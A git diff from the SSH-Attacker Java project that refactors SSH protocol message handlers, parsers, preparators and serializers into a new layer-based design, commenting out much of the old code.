a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java index e7268b49e..87141e3bb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java @@ -7,36 +7,29 @@ */ package de.rub.nds.sshattacker.core.protocol.common; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Handler; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public abstract class ProtocolMessageHandler> implements Handler { +public abstract class ProtocolMessageHandler + implements Handler { protected static final Logger LOGGER = LogManager.getLogger(); protected final SshContext context; - protected final T message; + // protected final MessageT message; public ProtocolMessageHandler(SshContext context) { - this(context, null); - } - - public ProtocolMessageHandler(SshContext context, T message) { this.context = context; - this.message = message; } - @Override - public abstract ProtocolMessageParser getParser(byte[] array); - - @Override - public abstract ProtocolMessageParser getParser(byte[] array, int startPosition); - - @Override - public abstract ProtocolMessagePreparator getPreparator(); + /* + public ProtocolMessageHandler(SshContext context, T message) { + this.context = context; + this.message = message; + } - @Override - public abstract ProtocolMessageSerializer getSerializer(); + */ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java index 54f197f2f..b456ecb46 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java @@ -9,19 +9,12 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; -import de.rub.nds.sshattacker.core.exceptions.ParserException; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.packet.BlobPacket; +import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.authentication.parser.*; -import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenUnknownMessage; -import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestUnknownMessage; -import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestUnknownMessage; import de.rub.nds.sshattacker.core.protocol.connection.parser.*; -import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.*; -import de.rub.nds.sshattacker.core.state.SshContext; -import java.nio.charset.StandardCharsets; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -31,20 +24,24 @@ public abstract class ProtocolMessageParser> extend protected final T message = createMessage(); - public ProtocolMessageParser(byte[] array) { + public ProtocolMessageParser(InputStream stream) { + super(stream); + } + + /*public ProtocolMessageParser(byte[] array) { super(array); } public ProtocolMessageParser(byte[] array, int startPosition) { super(array, startPosition); - } + }*/ - @Override + /*@Override public final T parse() { parseProtocolMessageContents(); setCompleteResultingMessage(); return message; - } + }*/ protected abstract T createMessage(); @@ -58,7 +55,7 @@ private void setCompleteResultingMessage() { message.getCompleteResultingMessage().getValue())); } - public static ProtocolMessage delegateParsing(AbstractPacket packet, SshContext context) { + /*public static ProtocolMessage delegateParsing(AbstractPacket packet, Context context) { byte[] raw = packet.getPayload().getValue(); try { if (packet instanceof BlobPacket) { @@ -185,7 +182,7 @@ public static ProtocolMessage delegateParsing(AbstractPacket packet, SshConte } public static HybridKeyExchangeReplyMessageParser handleHybridKeyExchangeReplyMessageParsing( - byte[] raw, SshContext context) { + byte[] raw, Context context) { LOGGER.info( "Negotiated Hybrid Key Exchange: " + context.getChooser().getKeyExchangeAlgorithm()); @@ -225,10 +222,10 @@ public static HybridKeyExchangeReplyMessageParser handleHybridKeyExchangeReplyMe CryptoConstants.NISTP521_POINT_SIZE, CryptoConstants.KYBER1024_CIPHERTEXT_SIZE); } - } + }*/ - public static HybridKeyExchangeInitMessageParser handleHybridKeyExchangeInitMessageParsing( - byte[] raw, SshContext context) { + /*public static HybridKeyExchangeInitMessageParser handleHybridKeyExchangeInitMessageParsing( + byte[] raw, Context context) { LOGGER.info( "Negotiated Hybrid Key Exchange: " + context.getChooser().getKeyExchangeAlgorithm()); @@ -291,9 +288,9 @@ private static ProtocolMessage handleUserAuthRequestMessageParsing(byte[] raw methodString); return message; } - } + }*/ - public static ProtocolMessage handleChannelRequestMessageParsing(byte[] raw) { + /*public static ProtocolMessage handleChannelRequestMessageParsing(byte[] raw) { ChannelRequestUnknownMessage message = new ChannelRequestUnknownMessageParser(raw).parse(); String requestTypeString = message.getRequestType().getValue(); ChannelRequestType requestType = ChannelRequestType.fromName(requestTypeString); @@ -328,9 +325,9 @@ public static ProtocolMessage handleChannelRequestMessageParsing(byte[] raw) requestTypeString); return message; } - } + }*/ - public static ProtocolMessage handleGlobalRequestMessageParsing(byte[] raw) { + /*public static ProtocolMessage handleGlobalRequestMessageParsing(byte[] raw) { GlobalRequestUnknownMessage message = new GlobalRequestUnknownMessageParser(raw).parse(); String requestTypeString = message.getRequestName().getValue(); GlobalRequestType requestType = GlobalRequestType.fromName(requestTypeString); @@ -363,5 +360,5 @@ public static ProtocolMessage handleChannelOpenMessageParsing(byte[] raw) { "Received unimplemented channel open message type: {}", channelTypeString); return message; } - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessagePreparator.java index 46f3898ad..e70638990 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessagePreparator.java @@ -7,10 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.common; +import de.rub.nds.sshattacker.core.layer.data.Preparator; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -public abstract class ProtocolMessagePreparator> - extends Preparator { +public abstract class ProtocolMessagePreparator extends Preparator { public ProtocolMessagePreparator(Chooser chooser, T message) { super(chooser, message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java index 10e485431..2b984e083 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java @@ -7,8 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.common; -public abstract class ProtocolMessageSerializer> - extends Serializer { +import de.rub.nds.sshattacker.core.layer.data.Serializer; + +public abstract class ProtocolMessageSerializer extends Serializer { protected final T message; @@ -17,8 +18,9 @@ public ProtocolMessageSerializer(T message) { } @Override - protected final void serializeBytes() { + protected final byte[] serializeBytes() { serializeProtocolMessageContents(); + return getAlreadySerialized(); } protected abstract void serializeProtocolMessageContents(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessage.java index 537f191ef..8c5e78616 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessage.java @@ -10,7 +10,7 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import jakarta.xml.bind.annotation.XmlAccessType; import jakarta.xml.bind.annotation.XmlAccessorType; import jakarta.xml.bind.annotation.XmlType; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageHandler.java index bd0896d06..41206bdfa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageHandler.java @@ -7,7 +7,7 @@ */ package de.rub.nds.sshattacker.core.protocol.common; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; public abstract class SshMessageHandler> extends ProtocolMessageHandler { @@ -15,19 +15,9 @@ public SshMessageHandler(SshContext context) { super(context); } - public SshMessageHandler(SshContext context, T message) { + /*public SshMessageHandler(SshContext context, T message) { super(context, message); } + */ - @Override - public abstract SshMessageParser getParser(byte[] array); - - @Override - public abstract SshMessageParser getParser(byte[] array, int startPosition); - - @Override - public abstract SshMessagePreparator getPreparator(); - - @Override - public abstract SshMessageSerializer getSerializer(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java index 857cf2002..723c3ac22 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java @@ -8,15 +8,20 @@ package de.rub.nds.sshattacker.core.protocol.common; import de.rub.nds.sshattacker.core.constants.SshMessageConstants; +import java.io.InputStream; public abstract class SshMessageParser> extends ProtocolMessageParser { - public SshMessageParser(byte[] array) { + /*public SshMessageParser(byte[] array) { super(array); } public SshMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + + public SshMessageParser(InputStream stream) { + super(stream); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java index 718c70138..7b49348ee 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java @@ -7,28 +7,21 @@ */ package de.rub.nds.sshattacker.core.protocol.common.layer; -import de.rub.nds.sshattacker.core.constants.PacketLayerType; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.packet.BinaryPacket; -import de.rub.nds.sshattacker.core.packet.BlobPacket; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; -import de.rub.nds.sshattacker.core.state.SshContext; -import java.util.stream.Stream; +import de.rub.nds.sshattacker.core.state.Context; public class MessageLayer { - private final SshContext context; + private final Context context; - public MessageLayer(SshContext context) { + public MessageLayer(Context context) { this.context = context; } - public ProtocolMessage parse(AbstractPacket packet) { + /*public ProtocolMessage parse(AbstractPacket packet) { return ProtocolMessageParser.delegateParsing(packet, context); - } + }*/ - public Stream> parse(Stream packetStream) { + /*public Stream> parse(Stream packetStream) { return packetStream.map(this::parse); } @@ -45,5 +38,5 @@ public AbstractPacket serialize(ProtocolMessage message) { public Stream serialize(Stream> messageStream) { return messageStream.map(this::serialize); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/ChannelManager.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/ChannelManager.java index eaf7a81be..f52cf6746 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/ChannelManager.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/ChannelManager.java @@ -8,10 +8,10 @@ package de.rub.nds.sshattacker.core.protocol.connection; import de.rub.nds.sshattacker.core.constants.ChannelType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenConfirmationMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenMessage; -import de.rub.nds.sshattacker.core.state.SshContext; import java.util.*; import java.util.stream.IntStream; import org.apache.logging.log4j.LogManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java index 57ed769f8..71d730e49 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java @@ -7,13 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelCloseMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelCloseMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelCloseMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -25,12 +22,12 @@ public ChannelCloseMessageHandler(SshContext context) { super(context); } - public ChannelCloseMessageHandler(SshContext context, ChannelCloseMessage message) { + /*public ChannelCloseMessageHandler(SshContext context, ChannelCloseMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelCloseMessage message) { Channel channel = context.getChannels().get(message.getRecipientChannelId().getValue()); if (channel != null) { if (!channel.isOpen().getValue()) { @@ -52,7 +49,7 @@ public void adjustContext() { } } - @Override + /*@Override public ChannelCloseMessageParser getParser(byte[] array) { return new ChannelCloseMessageParser(array); } @@ -70,5 +67,5 @@ public ChannelCloseMessagePreparator getPreparator() { @Override public ChannelMessageSerializer getSerializer() { return new ChannelMessageSerializer<>(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelDataMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelDataMessageHandler.java index 7b4a7d320..af168eb2c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelDataMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelDataMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelDataMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelDataMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelDataMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelDataMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ChannelDataMessageHandler extends SshMessageHandler { @@ -20,16 +17,17 @@ public ChannelDataMessageHandler(SshContext context) { super(context); } - public ChannelDataMessageHandler(SshContext context, ChannelDataMessage message) { + /*public ChannelDataMessageHandler(SshContext context, ChannelDataMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelDataMessage message) { // TODO: Handle ChannelDataMessage } - @Override + /*@Override + public ChannelDataMessageParser getParser(byte[] array) { return new ChannelDataMessageParser(array); } @@ -47,5 +45,5 @@ public ChannelDataMessagePreparator getPreparator() { @Override public ChannelDataMessageSerializer getSerializer() { return new ChannelDataMessageSerializer(message); - } + } */ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelEofMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelEofMessageHandler.java index dba92c694..9aff364c2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelEofMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelEofMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelEofMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelEofMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelEofMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ChannelEofMessageHandler extends SshMessageHandler { @@ -20,16 +17,16 @@ public ChannelEofMessageHandler(SshContext context) { super(context); } - public ChannelEofMessageHandler(SshContext context, ChannelEofMessage message) { + /*public ChannelEofMessageHandler(SshContext context, ChannelEofMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelEofMessage message) { // TODO: Handle ChannelEofMessage } - @Override + /*@Override public ChannelEofMessageParser getParser(byte[] array) { return new ChannelEofMessageParser(array); } @@ -47,5 +44,5 @@ public ChannelEofMessagePreparator getPreparator() { @Override public ChannelMessageSerializer getSerializer() { return new ChannelMessageSerializer<>(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelExtendedDataMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelExtendedDataMessageHandler.java index 5dea1bd92..00c5e9a2d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelExtendedDataMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelExtendedDataMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelExtendedDataMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelExtendedDataMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelExtendedDataMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelExtendedDataMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ChannelExtendedDataMessageHandler extends SshMessageHandler { @@ -21,17 +18,17 @@ public ChannelExtendedDataMessageHandler(SshContext context) { super(context); } - public ChannelExtendedDataMessageHandler( + /*public ChannelExtendedDataMessageHandler( SshContext context, ChannelExtendedDataMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelExtendedDataMessage message) { // TODO: Handle ChannelExtendedDataMessage } - @Override + /*@Override public ChannelExtendedDataMessageParser getParser(byte[] array) { return new ChannelExtendedDataMessageParser(array); } @@ -49,5 +46,5 @@ public ChannelExtendedDataMessagePreparator getPreparator() { @Override public ChannelExtendedDataMessageSerializer getSerializer() { return new ChannelExtendedDataMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelFailureMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelFailureMessageHandler.java index 0adc0960f..20649f6cf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelFailureMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelFailureMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelFailureMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelFailureMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelFailureMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ChannelFailureMessageHandler extends SshMessageHandler { @@ -20,16 +17,16 @@ public ChannelFailureMessageHandler(SshContext context) { super(context); } - public ChannelFailureMessageHandler(SshContext context, ChannelFailureMessage message) { + /*public ChannelFailureMessageHandler(SshContext context, ChannelFailureMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelFailureMessage message) { // TODO: Handle ChannelFailureMessage } - @Override + /*@Override public ChannelFailureMessageParser getParser(byte[] array) { return new ChannelFailureMessageParser(array); } @@ -47,5 +44,5 @@ public ChannelFailureMessagePreparator getPreparator() { @Override public ChannelMessageSerializer getSerializer() { return new ChannelMessageSerializer<>(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java index 5f36af6c1..17dce23a5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java @@ -7,13 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenConfirmationMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenConfirmationMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelOpenConfirmationMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelOpenConfirmationMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -26,13 +23,13 @@ public ChannelOpenConfirmationMessageHandler(SshContext context) { super(context); } - public ChannelOpenConfirmationMessageHandler( + /*public ChannelOpenConfirmationMessageHandler( SshContext context, ChannelOpenConfirmationMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelOpenConfirmationMessage message) { Channel channel = context.getChannels().get(message.getRecipientChannelId().getValue()); if (channel == null) { LOGGER.warn( @@ -50,7 +47,7 @@ public void adjustContext() { channel.setOpen(true); } - @Override + /*@Override public ChannelOpenConfirmationMessageParser getParser(byte[] array) { return new ChannelOpenConfirmationMessageParser(array); } @@ -68,5 +65,5 @@ public ChannelOpenConfirmationMessagePreparator getPreparator() { @Override public ChannelOpenConfirmationMessageSerializer getSerializer() { return new ChannelOpenConfirmationMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java index bef0b0476..411c7f10f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenFailureMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenFailureMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelOpenFailureMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelOpenFailureMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -24,12 +21,12 @@ public ChannelOpenFailureMessageHandler(SshContext context) { super(context); } - public ChannelOpenFailureMessageHandler(SshContext context, ChannelOpenFailureMessage message) { + /*public ChannelOpenFailureMessageHandler(SshContext context, ChannelOpenFailureMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelOpenFailureMessage message) { if (!context.getChannels().containsKey(message.getRecipientChannelId().getValue())) { LOGGER.warn( "{} received but no channel with id {} found locally, ignoring it.", @@ -39,7 +36,7 @@ public void adjustContext() { context.getChannels().remove(message.getRecipientChannelId().getValue()); } - @Override + /*@Override public ChannelOpenFailureMessageParser getParser(byte[] array) { return new ChannelOpenFailureMessageParser(array); } @@ -57,5 +54,5 @@ public ChannelOpenFailureMessagePreparator getPreparator() { @Override public ChannelOpenFailureMessageSerializer getSerializer() { return new ChannelOpenFailureMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenSessionMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenSessionMessageHandler.java index 9604db492..1aa7b04fc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenSessionMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenSessionMessageHandler.java @@ -7,26 +7,23 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenSessionMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenSessionMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelOpenSessionMessagePreperator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelOpenSessionMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ChannelOpenSessionMessageHandler extends SshMessageHandler { public ChannelOpenSessionMessageHandler(SshContext context) { super(context); } - public ChannelOpenSessionMessageHandler(SshContext context, ChannelOpenSessionMessage message) { + /*public ChannelOpenSessionMessageHandler(SshContext context, ChannelOpenSessionMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() {} + public void adjustContext(ChannelOpenSessionMessage message) {} - @Override + /*@Override public ChannelOpenSessionMessageParser getParser(byte[] array) { return new ChannelOpenSessionMessageParser(array); } @@ -44,5 +41,5 @@ public ChannelOpenSessionMessagePreperator getPreparator() { @Override public ChannelOpenSessionMessageSerializer getSerializer() { return new ChannelOpenSessionMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenUnknownMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenUnknownMessageHandler.java index 7b48cc523..d2ff696e4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenUnknownMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenUnknownMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenUnknownMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenUnknownMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelOpenUnknownMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelOpenUnknownMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ChannelOpenUnknownMessageHandler extends SshMessageHandler { @@ -20,14 +17,16 @@ public ChannelOpenUnknownMessageHandler(SshContext context) { super(context); } - public ChannelOpenUnknownMessageHandler(SshContext context, ChannelOpenUnknownMessage message) { + /*public ChannelOpenUnknownMessageHandler(SshContext context, ChannelOpenUnknownMessage message) { super(context, message); } + / + */ @Override - public void adjustContext() {} + public void adjustContext(ChannelOpenUnknownMessage message) {} - @Override + /*@Override public ChannelOpenUnknownMessageParser getParser(byte[] array) { return new ChannelOpenUnknownMessageParser(array); } @@ -45,5 +44,5 @@ public ChannelOpenUnknownMessagePreparator getPreparator() { @Override public ChannelOpenUnknownMessageSerializer getSerializer() { return new ChannelOpenUnknownMessageSerializer(message); - } + }*/ } diff --git 